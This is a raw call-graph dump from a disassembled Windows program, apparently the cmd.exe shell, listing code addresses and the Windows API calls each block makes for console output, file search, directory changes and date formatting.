16924->16870 16926 7ff7ab131f53 16925->16926 16928 7ff7ab12b914 16927->16928 16928->16928 16929 7ff7ab12cd90 166 API calls 16928->16929 16930 7ff7ab12b92a 16929->16930 16930->16870 16932 7ff7ab138f89 16931->16932 16933 7ff7ab127ed5 16932->16933 16934 7ff7ab138fe0 RtlCaptureContext RtlLookupFunctionEntry 16932->16934 16933->16839 16935 7ff7ab139067 16934->16935 16936 7ff7ab139025 RtlVirtualUnwind 16934->16936 17455 7ff7ab138fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16935->17455 16936->16935 16940 7ff7ab1382cd 16939->16940 16941 7ff7ab13829d GetLastError 16939->16941 16943 7ff7ab138365 FindNextFileW 16940->16943 16946 7ff7ab1382e5 16940->16946 16942 7ff7ab1382af 16941->16942 16942->16870 16944 7ff7ab13837d 16943->16944 16945 7ff7ab1383d0 FindClose 16943->16945 16944->16940 16947 7ff7ab138386 16944->16947 16945->16946 16948 7ff7ab138332 GetProcessHeap HeapAlloc 16946->16948 16949 7ff7ab138302 16946->16949 16951 7ff7ab138310 16946->16951 16947->16941 16948->16951 16950 7ff7ab13838b GetProcessHeap HeapReAlloc 16949->16950 16949->16951 16950->16951 16952 7ff7ab1450f8 GetLastError FindClose 16950->16952 16951->16941 16951->16942 16952->16942 16954 7ff7ab128b51 16953->16954 16955 7ff7ab128b79 16954->16955 16956 7ff7ab13b444 SetErrorMode 16954->16956 16957 7ff7ab12b998 207 API calls 16955->16957 17456 7ff7ab1326e0 16956->17456 16959 7ff7ab128b83 16957->16959 16963 7ff7ab128ba6 wcsrchr 16959->16963 16972 7ff7ab128bc6 _wcsicmp 16959->16972 16976 7ff7ab128c06 16959->16976 16960 7ff7ab13b46a 16962 7ff7ab13b49d 16960->16962 16966 7ff7ab1301b8 6 API calls 16960->16966 16961 7ff7ab128d6c wcsrchr 16961->16976 16964 7ff7ab13b4b2 16962->16964 16965 7ff7ab13b4d6 16962->16965 16963->16972 16973 7ff7ab123278 166 API calls 16964->16973 16980 7ff7ab13b499 16964->16980 16968 7ff7ab123278 166 API calls 16965->16968 16969 7ff7ab13b478 16966->16969 16967 7ff7ab12b998 207 API calls 16967->16976 16968->16980 16974 7ff7ab13b487 16969->16974 17480 7ff7ab14f318 _get_osfhandle GetFileType 16969->17480 16971 7ff7ab128be8 _wcsicmp 16971->16976 16972->16971 16972->16976 16973->16980 16975 7ff7ab1301b8 6 API calls 16974->16975 16978 7ff7ab13b48e 16975->16978 16976->16961 16976->16967 16979 7ff7ab128c13 GetFileAttributesW 16976->16979 16986 7ff7ab128c49 16976->16986 16978->16980 17481 7ff7ab14f318 _get_osfhandle GetFileType 16978->17481 16979->16976 16983 7ff7ab128c2f GetLastError 16979->16983 16981 7ff7ab13b4f4 SetErrorMode 16980->16981 16984 7ff7ab12d208 _close 16980->16984 16981->16955 16982 7ff7ab13b483 16982->16962 16982->16974 16983->16976 16984->16981 16987 7ff7ab128ce6 16986->16987 16988 7ff7ab128cab wcschr 16986->16988 16987->16870 16989 7ff7ab128d1d wcschr 16988->16989 16990 7ff7ab128cc4 16988->16990 16989->16990 16991 7ff7ab128ccf wcschr 16989->16991 16990->16991 16991->16987 16993 7ff7ab12ca40 17 API calls 16992->16993 16994 7ff7ab12b396 16993->16994 16995 7ff7ab146d1c 14 API calls 16994->16995 16996 7ff7ab12b3ca 16994->16996 16997 7ff7ab13c27c 16995->16997 16996->16870 16999 7ff7ab12ca40 17 API calls 16998->16999 17000 7ff7ab128972 16999->17000 17001 7ff7ab146d1c 14 API calls 17000->17001 17002 7ff7ab1289a6 17000->17002 17003 7ff7ab13b3f6 17001->17003 17002->16870 17005 7ff7ab138a93 FindNextFileW 17004->17005 17006 7ff7ab138acd 17005->17006 17007 7ff7ab138aa3 GetLastError 17005->17007 17006->17005 17008 7ff7ab138ab7 17006->17008 17007->17008 17008->16870 17010 7ff7ab133a25 17009->17010 17011 7ff7ab133a53 FindClose 17009->17011 17010->17011 17014 7ff7ab13ec38 17010->17014 17012 7ff7ab133a66 17011->17012 17013 7ff7ab133a74 GetLastError 17011->17013 17012->16870 17013->17012 17482 7ff7ab1232b0 17015->17482 17017 7ff7ab1232a4 17017->16864 17019 7ff7ab139330 17018->17019 17025 7ff7ab139a6c 17019->17025 17021 7ff7ab12ca7b 17021->16877 17021->16878 17030 7ff7ab146c5c 17022->17030 17026 7ff7ab139a86 malloc 17025->17026 17027 7ff7ab139a77 17026->17027 17028 7ff7ab139a91 17026->17028 17027->17026 17029 7ff7ab139a97 Concurrency::cancel_current_task 17027->17029 17028->17021 17029->17021 17033 7ff7ab146a34 17030->17033 17034 7ff7ab146a41 17033->17034 17041 7ff7ab1463fc 17034->17041 17038 7ff7ab146b1d 17039 7ff7ab138f80 7 API calls 17038->17039 17040 7ff7ab146b2e 17039->17040 17040->16874 17042 7ff7ab146455 17041->17042 17043 7ff7ab146461 17041->17043 17042->17043 17044 7ff7ab146c5c 11 API calls 17042->17044 17045 7ff7ab1464f9 GetCurrentThreadId 17043->17045 17044->17043 17048 7ff7ab146561 17045->17048 17046 7ff7ab1465ea 17049 7ff7ab14666c OutputDebugStringW 17046->17049 17051 7ff7ab14660b 17046->17051 17056 7ff7ab145bf4 17046->17056 17047 7ff7ab1465f5 IsDebuggerPresent 17047->17046 17048->17046 17048->17047 17049->17051 17051->17038 17052 7ff7ab14742c 17051->17052 17053 7ff7ab14744a memset 17052->17053 17054 7ff7ab147444 17052->17054 17055 7ff7ab147489 17053->17055 17054->17053 17057 7ff7ab145e13 17056->17057 17060 7ff7ab145c2e 17056->17060 17058 7ff7ab138f80 7 API calls 17057->17058 17059 7ff7ab145e49 17058->17059 17059->17049 17060->17057 17061 7ff7ab145ca7 FormatMessageW 17060->17061 17062 7ff7ab145cfc 17061->17062 17063 7ff7ab145d1f 17061->17063 17085 7ff7ab1466bc 17062->17085 17064 7ff7ab1466bc _vsnwprintf 17063->17064 17066 7ff7ab145d1d 17064->17066 17067 7ff7ab145d54 GetCurrentThreadId 17066->17067 17068 7ff7ab1466bc _vsnwprintf 17066->17068 17069 7ff7ab1466bc _vsnwprintf 17067->17069 17070 7ff7ab145d51 17068->17070 17071 7ff7ab145d91 17069->17071 17070->17067 17071->17057 17072 7ff7ab1466bc _vsnwprintf 17071->17072 17073 7ff7ab145db9 17072->17073 17074 7ff7ab145dd4 17073->17074 17076 7ff7ab1466bc _vsnwprintf 17073->17076 17075 7ff7ab145def 17074->17075 17077 7ff7ab1466bc _vsnwprintf 17074->17077 17078 7ff7ab145dff 17075->17078 17079 7ff7ab145e15 17075->17079 17076->17074 17077->17075 17080 7ff7ab1466bc _vsnwprintf 17078->17080 17081 7ff7ab145e1d 17079->17081 17082 7ff7ab145e2b 17079->17082 17080->17057 17083 7ff7ab1466bc _vsnwprintf 17081->17083 17084 7ff7ab1466bc _vsnwprintf 17082->17084 17083->17057 17084->17057 17088 7ff7ab13363c 17085->17088 17089 7ff7ab133671 17088->17089 17090 7ff7ab133664 17088->17090 17089->17066 17092 7ff7ab133684 _vsnwprintf 17090->17092 17093 7ff7ab1336b7 17092->17093 17093->17089 17095 7ff7ab130877 17094->17095 17096 7ff7ab13085e 17094->17096 17097 7ff7ab130884 _wcsicmp 17095->17097 17099 7ff7ab130970 17095->17099 17096->16889 17096->16891 17098 7ff7ab1308a2 _wcsicmp 17097->17098 17107 7ff7ab130989 17097->17107 17100 7ff7ab1308c0 _wcsicmp 17098->17100 17098->17107 17115 7ff7ab133140 17099->17115 17103 7ff7ab1308de _wcsicmp 17100->17103 17100->17107 17101 7ff7ab13417c 154 API calls 17101->17107 17105 7ff7ab1308fc _wcsicmp 17103->17105 17106 7ff7ab13d8d3 GetCommandLineW 17103->17106 17105->17107 17108 7ff7ab13091a _wcsicmp 17105->17108 17111 7ff7ab13d8e5 rand 17106->17111 17107->17101 17141 7ff7ab1333f0 17107->17141 17145 7ff7ab126ee4 17107->17145 17179 7ff7ab139158 RtlCaptureContext RtlLookupFunctionEntry 17107->17179 17108->17099 17112 7ff7ab130934 _wcsicmp 17108->17112 17111->17107 17112->17111 17113 7ff7ab130952 _wcsicmp 17112->17113 17113->17099 17114 7ff7ab13d8f9 GetNumaHighestNodeNumber 17113->17114 17114->17107 17116 7ff7ab13e59e 17115->17116 17117 7ff7ab133184 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 17115->17117 17184 7ff7ab148654 17116->17184 17118 7ff7ab13e5ed 17117->17118 17119 7ff7ab1331e0 17117->17119 17121 7ff7ab13e5fe 17118->17121 17128 7ff7ab13e750 17118->17128 17122 7ff7ab13e5a8 17119->17122 17123 7ff7ab1331ff 17119->17123 17195 7ff7ab135508 GetUserDefaultLCID 17121->17195 17190 7ff7ab133448 17122->17190 17125 7ff7ab1333f0 _vsnwprintf 17123->17125 17130 7ff7ab133247 17125->17130 17129 7ff7ab1333f0 _vsnwprintf 17128->17129 17131 7ff7ab13e748 17129->17131 17132 7ff7ab138f80 7 API calls 17130->17132 17138 7ff7ab13e5e8 17131->17138 17197 7ff7ab1334a0 17131->17197 17134 7ff7ab133266 17132->17134 17133 7ff7ab13e711 17135 7ff7ab135508 GetUserDefaultLCID 17133->17135 17134->17107 17136 7ff7ab13e716 GetTimeFormatW 17135->17136 17136->17131 17138->17138 17139 7ff7ab13e629 17139->17133 17139->17139 17140 7ff7ab13e6e7 memmove 17139->17140 17140->17139 17142 7ff7ab133421 17141->17142 17143 7ff7ab133433 17141->17143 17144 7ff7ab133684 _vsnwprintf 17142->17144 17143->17107 17144->17143 17146 7ff7ab126f30 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 17145->17146 17172 7ff7ab126fbf 17145->17172 17148 7ff7ab126f90 17146->17148 17150 7ff7ab1442b6 17146->17150 17147 7ff7ab148654 9 API calls 17147->17172 17149 7ff7ab135508 GetUserDefaultLCID 17148->17149 17151 7ff7ab126f97 GetLocaleInfoW 17149->17151 17152 7ff7ab144322 realloc 17150->17152 17153 7ff7ab14433f 17150->17153 17156 7ff7ab123278 153 API calls 17150->17156 17151->17172 17152->17150 17152->17153 17154 7ff7ab1333f0 _vsnwprintf 17153->17154 17161 7ff7ab14437d 17154->17161 17155 7ff7ab135508 GetUserDefaultLCID 17157 7ff7ab127042 GetDateFormatW 17155->17157 17156->17150 17158 7ff7ab12707a 17157->17158 17159 7ff7ab135508 GetUserDefaultLCID 17158->17159 17165 7ff7ab12708a 17158->17165 17160 7ff7ab12714a GetDateFormatW 17159->17160 17162 7ff7ab1442a0 GetLastError 17160->17162 17163 7ff7ab127175 realloc 17160->17163 17167 7ff7ab1443ea 17161->17167 17173 7ff7ab1443fb 17161->17173 17162->17150 17163->17150 17166 7ff7ab12719c 17163->17166 17164 7ff7ab14427f memmove 17164->17172 17165->17161 17176 7ff7ab1270bd 17165->17176 17168 7ff7ab135508 GetUserDefaultLCID 17166->17168 17170 7ff7ab133448 153 API calls 17167->17170 17171 7ff7ab1271ae GetDateFormatW 17168->17171 17169 7ff7ab127020 memmove 17169->17172 17175 7ff7ab1443f9 17170->17175 17171->17162 17171->17172 17172->17147 17172->17155 17172->17164 17172->17169 17174 7ff7ab133448 153 API calls 17173->17174 17174->17175 17176->17175 17176->17176 17177 7ff7ab138f80 7 API calls 17176->17177 17178 7ff7ab127129 17177->17178 17178->17107 17180 7ff7ab1391d7 17179->17180 17181 7ff7ab139195 RtlVirtualUnwind 17179->17181 17244 7ff7ab138fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17180->17244 17181->17180 17185 7ff7ab148673 GetSystemTime 17184->17185 17186 7ff7ab148686 17184->17186 17187 7ff7ab1486cc SystemTimeToFileTime 17185->17187 17186->17187 17188 7ff7ab138f80 7 API calls 17187->17188 17189 7ff7ab1486ed 17188->17189 17189->17122 17191 7ff7ab13363c _vsnwprintf 17190->17191 17192 7ff7ab13347b 17191->17192 17193 7ff7ab1334a0 166 API calls 17192->17193 17194 7ff7ab133491 17193->17194 17194->17138 17196 7ff7ab135529 GetLocaleInfoW 17195->17196 17196->17139 17198 7ff7ab1334bf 17197->17198 17219 7ff7ab1334f5 17197->17219 17220 7ff7ab133578 _get_osfhandle 17198->17220 17201 7ff7ab13350d AcquireSRWLockShared _get_osfhandle WriteConsoleW 17203 7ff7ab133557 ReleaseSRWLockShared 17201->17203 17204 7ff7ab13e8d2 GetLastError 17201->17204 17202 7ff7ab1334cd 17227 7ff7ab1336ec _get_osfhandle 17202->17227 17206 7ff7ab1334e1 17203->17206 17207 7ff7ab13e8e5 GetLastError 17204->17207 17206->17207 17206->17219 17234 7ff7ab1301b8 _get_osfhandle GetFileType 17207->17234 17210 7ff7ab13e918 17239 7ff7ab14f318 _get_osfhandle GetFileType 17210->17239 17211 7ff7ab13e908 17212 7ff7ab123278 160 API calls 17211->17212 17212->17219 17214 7ff7ab13e91f 17215 7ff7ab13e931 17214->17215 17216 7ff7ab13e923 17214->17216 17240 7ff7ab14f1d8 17215->17240 17218 7ff7ab123278 160 API calls 17216->17218 17218->17219 17219->17138 17221 7ff7ab133599 GetFileType 17220->17221 17222 7ff7ab1334c9 17220->17222 17221->17222 17225 7ff7ab1335b1 17221->17225 17222->17201 17222->17202 17223 7ff7ab13e940 17224 7ff7ab1335c3 GetStdHandle 17226 7ff7ab1335d2 AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 17224->17226 17225->17223 17225->17224 17225->17226 17226->17222 17228 7ff7ab13e95c WriteFile 17227->17228 17231 7ff7ab133731 17227->17231 17229 7ff7ab13e980 WideCharToMultiByte WriteFile 17228->17229 17229->17231 17232 7ff7ab1337a1 17229->17232 17230 7ff7ab133747 17230->17232 17233 7ff7ab13374b WideCharToMultiByte WriteFile 17230->17233 17231->17229 17231->17230 17231->17232 17232->17206 17233->17232 17235 7ff7ab1301eb 17234->17235 17237 7ff7ab130200 17234->17237 17235->17210 17235->17211 17236 7ff7ab130212 GetStdHandle 17238 7ff7ab130221 AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 17236->17238 17237->17235 17237->17236 17237->17238 17238->17235 17239->17214 17241 7ff7ab14f1e8 17240->17241 17242 7ff7ab14f220 17241->17242 17243 7ff7ab123278 166 API calls 17241->17243 17242->17219 17243->17242 17277 7ff7ab12cd90 17245->17277 17248 7ff7ab12b9a6 17248->16896 17249 7ff7ab14e91c 198 API calls 17250 7ff7ab12b9b1 memset 17249->17250 17252 7ff7ab12ca40 17 API calls 17250->17252 17256 7ff7ab12ba4c 17252->17256 17253 7ff7ab13c3a8 17254 7ff7ab12b998 199 API calls 17253->17254 17263 7ff7ab13c41a 17254->17263 17255 7ff7ab12badb 17255->17253 17258 7ff7ab12bcef GetFileAttributesW 17255->17258 17260 7ff7ab12bb05 17255->17260 17256->17253 17256->17255 17257 7ff7ab12ba80 wcschr 17256->17257 17259 7ff7ab12baa0 wcschr 17256->17259 17256->17260 17264 7ff7ab12bb47 17256->17264 17257->17255 17257->17256 17258->17260 17259->17256 17262 7ff7ab12bb29 _wcsicmp 17260->17262 17260->17264 17262->17260 17264->17253 17265 7ff7ab12bb6b 17264->17265 17283 7ff7ab1288a8 17264->17283 17265->17253 17268 7ff7ab12bb92 17265->17268 17266 7ff7ab12bc82 iswspace 17266->17265 17267 7ff7ab12bc99 wcschr 17266->17267 17267->17265 17269 7ff7ab12bc46 17267->17269 17270 7ff7ab12bbee 17268->17270 17271 7ff7ab12bbe2 ??_V@YAXPEAX 17268->17271 17269->17253 17269->17265 17269->17266 17272 7ff7ab138f80 7 API calls 17270->17272 17271->17270 17273 7ff7ab12bc01 17272->17273 17273->16896 17287 7ff7ab14e9b4 17274->17287 17278 7ff7ab13c84e 17277->17278 17279 7ff7ab12cda1 GetProcessHeap HeapAlloc 17277->17279 17281 7ff7ab123278 164 API calls 17278->17281 17279->17278 17280 7ff7ab12b9a1 17279->17280 17280->17248 17280->17249 17282 7ff7ab13c858 17281->17282 17284 7ff7ab1288fc 17283->17284 17286 7ff7ab1288cf 17283->17286 17284->17269 17285 7ff7ab1288df _wcsicmp 17285->17286 17286->17284 17286->17285 17289 7ff7ab14ea0f 17287->17289 17290 7ff7ab14e9d9 17287->17290 17288 7ff7ab14ea67 17317 7ff7ab14c978 17288->17317 17289->17288 17312 7ff7ab12af98 17289->17312 17299 7ff7ab126a48 17290->17299 17294 7ff7ab14ea6c 17295 7ff7ab14eaae 17294->17295 17327 7ff7ab12d208 17294->17327 17296 7ff7ab14eacf 17295->17296 17297 7ff7ab133a0c 2 API calls 17295->17297 17297->17295 17300 7ff7ab126b23 17299->17300 17302 7ff7ab126a51 17299->17302 17300->17289 17301 7ff7ab14417c 17401 7ff7ab14ec14 memset 17301->17401 17302->17300 17302->17301 17303 7ff7ab126ab2 17302->17303 17332 7ff7ab133c24 17303->17332 17314 7ff7ab12afb1 17312->17314 17313 7ff7ab12afdb 17313->17289 17314->17313 17316 7ff7ab12d208 _close 17314->17316 17453 7ff7ab12b038 _dup2 17314->17453 17316->17314 17318 7ff7ab14ca9e 17317->17318 17319 7ff7ab14c98e 17317->17319 17318->17294 17320 7ff7ab14ee4c TerminateProcess GetLastError 17319->17320 17326 7ff7ab14c9b3 17319->17326 17320->17319 17321 7ff7ab135cb4 7 API calls 17321->17326 17322 7ff7ab12d208 _close 17322->17326 17323 7ff7ab14ca21 _get_osfhandle FlushFileBuffers 17324 7ff7ab12b038 _dup2 17323->17324 17324->17326 17325 7ff7ab12b038 _dup2 17325->17326 17326->17318 17326->17321 17326->17322 17326->17323 17326->17325 17328 7ff7ab12d246 17327->17328 17330 7ff7ab12d211 17327->17330 17328->17294 17329 7ff7ab12d238 _close 17329->17328 17330->17329 17331 7ff7ab13ca0e 17330->17331 17331->17294 17333 7ff7ab133c67 17332->17333 17335 7ff7ab12ca40 17 API calls 17333->17335 17380 7ff7ab13412c 17333->17380 17334 7ff7ab138f80 7 API calls 17336 7ff7ab126abf GetProcessHeap RtlFreeHeap 17334->17336 17337 7ff7ab133c94 17335->17337 17397 7ff7ab126b84 SetEnvironmentStringsW GetProcessHeap RtlFreeHeap 17336->17397 17338 7ff7ab13ec97 17337->17338 17339 7ff7ab12b900 146 API calls 17337->17339 17340 7ff7ab13855c ??_V@YAXPEAX 17338->17340 17341 7ff7ab133ca7 17339->17341 17342 7ff7ab13eca1 17340->17342 17341->17338 17343 7ff7ab133cb8 GetCurrentDirectoryW towupper iswalpha 17341->17343 17345 7ff7ab133fb8 17343->17345 17346 7ff7ab133d68 17343->17346 17348 7ff7ab133fc6 GetLastError 17345->17348 17346->17345 17347 7ff7ab133d72 towupper GetFullPathNameW 17346->17347 17347->17348 17349 7ff7ab133dd3 17347->17349 17440 7ff7ab13855c 17348->17440 17351 7ff7ab133fe0 17349->17351 17364 7ff7ab133de3 17349->17364 17353 7ff7ab13855c ??_V@YAXPEAX 17351->17353 17352 7ff7ab1340fe 17354 7ff7ab13855c ??_V@YAXPEAX 17352->17354 17355 7ff7ab133ffb _local_unwind 17353->17355 17356 7ff7ab134108 _local_unwind 17354->17356 17357 7ff7ab13400c GetLastError 17355->17357 17360 7ff7ab133f98 17356->17360 17358 7ff7ab134028 17357->17358 17359 7ff7ab133e95 17357->17359 17358->17359 17361 7ff7ab134031 17358->17361 17362 7ff7ab133ecf 17359->17362 17422 7ff7ab132978 17359->17422 17443 7ff7ab12ff70 17360->17443 17366 7ff7ab13855c ??_V@YAXPEAX 17361->17366 17368 7ff7ab133f08 17362->17368 17369 7ff7ab133ed5 GetFileAttributesW 17362->17369 17364->17352 17365 7ff7ab133e66 GetFileAttributesW 17364->17365 17365->17357 17365->17359 17371 7ff7ab13403b _local_unwind 17366->17371 17376 7ff7ab133f1e SetCurrentDirectoryW 17368->17376 17381 7ff7ab133f46 17368->17381 17373 7ff7ab134067 GetLastError 17369->17373 17374 7ff7ab133efd 17369->17374 17377 7ff7ab13404c 17371->17377 17372 7ff7ab133ec7 17372->17362 17372->17377 17378 7ff7ab13855c ??_V@YAXPEAX 17373->17378 17374->17368 17379 7ff7ab13409d 17374->17379 17375 7ff7ab13855c ??_V@YAXPEAX 17375->17380 17376->17381 17382 7ff7ab1340b8 GetLastError 17376->17382 17383 7ff7ab13855c ??_V@YAXPEAX 17377->17383 17384 7ff7ab13408c _local_unwind 17378->17384 17385 7ff7ab13855c ??_V@YAXPEAX 17379->17385 17380->17334 17435 7ff7ab13498c 17381->17435 17386 7ff7ab13855c ??_V@YAXPEAX 17382->17386 17389 7ff7ab134056 _local_unwind 17383->17389 17384->17379 17390 7ff7ab1340a7 _local_unwind 17385->17390 17391 7ff7ab1340d2 _local_unwind 17386->17391 17389->17373 17390->17382 17392 7ff7ab1340e3 17391->17392 17394 7ff7ab13855c ??_V@YAXPEAX 17392->17394 17393 7ff7ab133f6f 17395 7ff7ab13417c 146 API calls 17393->17395 17396 7ff7ab1340ed _local_unwind 17394->17396 17395->17360 17396->17352 17398 7ff7ab134a14 5 API calls 17397->17398 17399 7ff7ab126ae8 17398->17399 17400 7ff7ab126b30 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 17399->17400 17402 7ff7ab12ca40 17 API calls 17401->17402 17403 7ff7ab14ec96 17402->17403 17404 7ff7ab14edf7 17403->17404 17407 7ff7ab13081c 166 API calls 17403->17407 17405 7ff7ab14ee0a ??_V@YAXPEAX 17404->17405 17406 7ff7ab14ee16 17404->17406 17405->17406 17408 7ff7ab138f80 7 API calls 17406->17408 17409 7ff7ab14ecca 17407->17409 17410 7ff7ab144190 17408->17410 17411 7ff7ab14ecfb 17409->17411 17412 7ff7ab14ecd2 SetCurrentDirectoryW 17409->17412 17415 7ff7ab13498c 8 API calls 17411->17415 17413 7ff7ab14ece9 SetErrorMode 17412->17413 17414 7ff7ab14edd4 17412->17414 17413->17411 17416 7ff7ab13417c 166 API calls 17414->17416 17417 7ff7ab14ed89 SetCurrentDirectoryW 17415->17417 17416->17404 17418 7ff7ab14edac GetLastError 17417->17418 17419 7ff7ab14edc1 17417->17419 17420 7ff7ab123278 166 API calls 17418->17420 17419->17414 17421 7ff7ab14edc6 SetErrorMode 17419->17421 17420->17419 17421->17414 17423 7ff7ab1329b9 17422->17423 17424 7ff7ab132a1e FindFirstFileW 17423->17424 17426 7ff7ab1329ed 17423->17426 17427 7ff7ab13e3f7 17423->17427 17428 7ff7ab132aeb _wcsnicmp 17423->17428 17431 7ff7ab13e3d6 _wcsicmp 17423->17431 17432 7ff7ab132a9d memmove 17423->17432 17433 7ff7ab13e404 memmove 17423->17433 17425 7ff7ab132a44 FindClose 17424->17425 17424->17427 17425->17423 17429 7ff7ab138f80 7 API calls 17426->17429 17427->17372 17428->17423 17430 7ff7ab132a02 17429->17430 17430->17372 17431->17423 17431->17427 17432->17423 17433->17427 17436 7ff7ab1349ba SetEnvironmentVariableW GetProcessHeap RtlFreeHeap 17435->17436 17437 7ff7ab1349a4 17435->17437 17447 7ff7ab134a14 GetEnvironmentStringsW 17436->17447 17437->17436 17441 7ff7ab138574 ??_V@YAXPEAX 17440->17441 17442 7ff7ab138583 17440->17442 17441->17442 17442->17351 17444 7ff7ab12ff7c 17443->17444 17445 7ff7ab12ffdb 17443->17445 17444->17445 17446 7ff7ab12ffb5 GetProcessHeap RtlFreeHeap 17444->17446 17445->17375 17446->17445 17448 7ff7ab133f67 17447->17448 17449 7ff7ab134a40 GetProcessHeap HeapAlloc 17447->17449 17448->17392 17448->17393 17451 7ff7ab134a91 memmove 17449->17451 17452 7ff7ab134a9f FreeEnvironmentStringsW 17449->17452 17451->17452 17452->17448 17454 7ff7ab12b061 17453->17454 17454->17314 17454->17454 17457 7ff7ab13272d 17456->17457 17458 7ff7ab132724 17456->17458 17457->16960 17458->17457 17459 7ff7ab13274b 17458->17459 17460 7ff7ab1327ef _wcsicmp 17458->17460 17461 7ff7ab132779 CreateFileW 17459->17461 17462 7ff7ab132817 CreateFileW 17459->17462 17460->17459 17463 7ff7ab132796 _open_osfhandle 17461->17463 17466 7ff7ab13e2f0 GetLastError 17461->17466 17462->17461 17462->17463 17465 7ff7ab132863 17463->17465 17467 7ff7ab1327b6 17463->17467 17468 7ff7ab1301b8 6 API calls 17465->17468 17466->17457 17467->16960 17469 7ff7ab13286a 17468->17469 17469->17467 17470 7ff7ab132872 GetFileSize 17469->17470 17470->17467 17471 7ff7ab132895 SetFilePointer 17470->17471 17472 7ff7ab13e31a GetLastError 17471->17472 17473 7ff7ab1328d2 ReadFile 17471->17473 17472->17473 17474 7ff7ab13e334 17472->17474 17475 7ff7ab13e362 SetFilePointer 17473->17475 17476 7ff7ab132901 17473->17476 17477 7ff7ab13e339 _close 17474->17477 17478 7ff7ab13e34d CloseHandle 17474->17478 17479 7ff7ab13e38e SetFilePointer 17475->17479 17476->17467 17476->17479 17477->17457 17478->17457 17479->17467 17480->16982 17481->16980 17483 7ff7ab133578 6 API calls 17482->17483 17484 7ff7ab1232e8 17483->17484 17485 7ff7ab1232f0 _get_osfhandle GetConsoleScreenBufferInfo 17484->17485 17486 7ff7ab12331d 17484->17486 17485->17486 17518 7ff7ab123410 17486->17518 17488 7ff7ab1233a8 17489 7ff7ab123498 17488->17489 17494 7ff7ab1233b0 17488->17494 17496 7ff7ab1411ff 17488->17496 17492 7ff7ab12349d wcschr 17489->17492 17493 7ff7ab1234b4 17489->17493 17490 7ff7ab1336ec 6 API calls 17509 7ff7ab12333d 17490->17509 17491 7ff7ab123368 WriteConsoleW 17497 7ff7ab1411cc GetLastError 17491->17497 17491->17509 17492->17489 17492->17493 17498 7ff7ab14121d GetProcessHeap HeapAlloc 17493->17498 17499 7ff7ab1234c4 FormatMessageW 17493->17499 17504 7ff7ab138f80 7 API calls 17494->17504 17495 7ff7ab141057 GetConsoleScreenBufferInfo 17501 7ff7ab141079 WriteConsoleW 17495->17501 17495->17509 17534 7ff7ab134c1c 17496->17534 17497->17509 17500 7ff7ab1234ef 17498->17500 17516 7ff7ab14124f FormatMessageW GetProcessHeap RtlFreeHeap 17498->17516 17499->17500 17506 7ff7ab138f80 7 API calls 17500->17506 17507 7ff7ab1410a8 9 API calls 17501->17507 17501->17509 17503 7ff7ab1411df GetLastError 17503->17488 17508 7ff7ab1233be 17504->17508 17505 7ff7ab123400 17505->17503 17511 7ff7ab1234ff 17506->17511 17507->17509 17512 7ff7ab141181 17507->17512 17508->17017 17509->17488 17509->17490 17509->17491 17509->17495 17509->17497 17509->17503 17509->17505 17511->17017 17533 7ff7ab14bde4 EnterCriticalSection LeaveCriticalSection 17512->17533 17513 7ff7ab1412cd _ultoa GetACP 17538 7ff7ab130460 17513->17538 17516->17513 17519 7ff7ab12345c FormatMessageW 17518->17519 17520 7ff7ab1412cd _ultoa GetACP 17518->17520 17519->17520 17529 7ff7ab12348b 17519->17529 17521 7ff7ab130460 17520->17521 17522 7ff7ab1412f9 MultiByteToWideChar 17521->17522 17523 7ff7ab12349d wcschr 17524 7ff7ab1234b4 17523->17524 17523->17529 17525 7ff7ab14121d GetProcessHeap HeapAlloc 17524->17525 17526 7ff7ab1234c4 FormatMessageW 17524->17526 17527 7ff7ab1234ef 17525->17527 17532 7ff7ab14124f FormatMessageW GetProcessHeap RtlFreeHeap 17525->17532 17526->17527 17528 7ff7ab138f80 7 API calls 17527->17528 17531 7ff7ab1234ff 17528->17531 17529->17523 17529->17524 17531->17509 17532->17520 17535 7ff7ab134c24 17534->17535 17537 7ff7ab134c2f exit 17535->17537 17540 7ff7ab134c50 17535->17540 17539 7ff7ab130472 MultiByteToWideChar 17538->17539 17546 7ff7ab134cb0 17540->17546 17543 7ff7ab134c6c 17543->17535 17544 7ff7ab133c24 164 API calls 17545 7ff7ab134c84 GetProcessHeap RtlFreeHeap 17544->17545 17545->17543 17547 7ff7ab134cda 17546->17547 17550 7ff7ab134cfa 17546->17550 17548 7ff7ab138f80 7 API calls 17547->17548 17549 7ff7ab134c64 17548->17549 17549->17543 17549->17544 17550->17547 17551 7ff7ab13eefe realloc 17550->17551 17551->17547 18440 7ff7ab134850 18441 7ff7ab134861 18440->18441 18442 7ff7ab13ed44 18440->18442 18447 7ff7ab134878 18441->18447 18444 7ff7ab134878 410 API calls 18442->18444 18446 7ff7ab13ed49 18444->18446 18449 7ff7ab13eda0 18447->18449 18451 7ff7ab13489f 18447->18451 18448 7ff7ab12d3f0 223 API calls 18448->18449 18449->18448 18465 7ff7ab13edcf 18449->18465 18539 7ff7ab149114 18449->18539 18451->18449 18452 7ff7ab1348d1 _wcsnicmp 18451->18452 18453 7ff7ab1348f2 _wcsnicmp 18452->18453 18454 7ff7ab134974 18452->18454 18456 7ff7ab13ed60 18453->18456 18463 7ff7ab134913 18453->18463 18472 7ff7ab136c00 18454->18472 18502 7ff7ab1493e8 18456->18502 18457 7ff7ab134866 18459 7ff7ab123278 166 API calls 18461 7ff7ab13ee59 18459->18461 18460 7ff7ab13492b 18464 7ff7ab134939 wcschr 18460->18464 18471 7ff7ab13ee15 18460->18471 18462 7ff7ab13ed80 wcsrchr 18462->18460 18463->18460 18463->18462 18463->18471 18466 7ff7ab134952 18464->18466 18467 7ff7ab13497f 18464->18467 18469 7ff7ab131ea0 8 API calls 18465->18469 18465->18471 18470 7ff7ab13498c 8 API calls 18466->18470 18485 7ff7ab1491b8 18467->18485 18469->18471 18470->18457 18471->18459 18473 7ff7ab13f900 18472->18473 18474 7ff7ab136c1d 18472->18474 18475 7ff7ab123278 166 API calls 18473->18475 18474->18473 18477 7ff7ab131ea0 8 API calls 18474->18477 18476 7ff7ab13f912 18475->18476 18478 7ff7ab136c2b 18477->18478 18545 7ff7ab1363c8 18478->18545 18480 